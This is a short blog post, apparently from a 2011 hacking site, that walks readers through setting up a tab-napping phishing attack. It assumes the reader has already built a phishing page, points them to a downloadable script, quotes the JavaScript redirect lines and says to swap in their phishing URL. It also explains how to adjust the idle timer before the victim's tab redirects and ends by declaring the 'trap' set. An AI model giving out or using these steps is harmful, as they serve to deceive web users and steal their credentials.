Home » , , , » HOW TO SETUP A TAB-NAPPING SCRIPT

HOW TO SETUP A TAB-NAPPING SCRIPT


Tab napping is a type of  phishing scam that does not require a victim to click on any url so that he / she is redirect you to a  phishing site . Instead it relies on the fact that a lot of people use tabbed browsing (Opening multiple tabs while browsing). In a tab napping scam, one of your inactive tabs is automatically replaced by with a new tab without your knowledge. 
To know more about tab Napping, you can check my earlier article here

How to setup a Tab Napping Script
1. Create an Ordinary phisher

  • First of all, you need to prepare a normal traditional phisher. In this tutorial, I will assume that you already know how to create a phishing page. If you don't know how, then go through my earlier tutorial on how to make a phisher .

2. Install the Script
  • Download the Tab Napping script here
  • Open the text file containing the script with a text editor like Notepad and search for the lines below;
timerPoll = setInterval("pollActivity()",1); //poll scrolling
timerRedirect =setInterval("location.href='http://username.site.com/fakepage.htm'",10000);


  • Now in the above script, replace http://username.site.com/fakepage.htm with your phishing url


Note that 10000 is the default time in milliseconds, that it will take before the victim's idle tab automatically redirects to your phishing page. Therefore you can modify the idle time too.. 


10000 milliseconds = 10 seconds
  • After you have edited the script, copy and paste it into the HTML of your site or blogger site
Thats it! your trap is set man!!! :xD

0 comments:

Click to view all comments:

Post a Comment

 
Copyright © 2011. Ethical Hacking Unleashed . All Rights Reserved.
Company Info | Contact Us | Privacy policy | Term of use | Widget | Advertise with Us | Site map
Template modify by Creating Website